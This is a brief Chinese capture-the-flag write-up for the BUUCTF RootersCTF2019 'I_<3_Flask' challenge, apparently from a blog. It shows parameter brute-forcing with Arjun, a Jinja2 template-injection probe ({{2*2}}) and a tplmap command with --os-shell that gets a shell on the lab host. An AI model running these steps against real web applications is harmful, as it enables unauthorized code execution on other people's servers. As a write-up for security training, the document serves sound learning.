BUUCTF [RootersCTF2019] I_<3_Flask
考点:
-
Jinjia2模版注入
-
Arjun
参数爆破工具 -
tplmap
模版注入工具
启动环境:
一道
Flask
题目,大概率为模版注入,先用
Arjun
工具对可利用传参进行爆破:
python3 arjun.py -u http://xxx.node3.buuoj.cn/ -m GET -c 200
得到参数名:
name
尝试传入值:
?name=1
页面发生了变化,传参被成功执行,尝试模版注入:
?name={{2*2}}
成功执行,存在模版注入漏洞,使用
tplmap
进行扫描:
python2 tplmap.py -u 'http://xxx.node3.buuoj.cn/?name=1'
得到返回结果:
Engine: Jinja2
判断为
Jinjia2模版注入
,使用
tplmap
继续
getshell
:
python2 tplmap.py -u 'http://943902f6-cd89-459c-b3d0-331243c9ad38.node3.buuoj.cn/?name=1' --os-shell
拿到shell,尝试查找flag:
得到flag
版权声明:本文为weixin_44037296原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。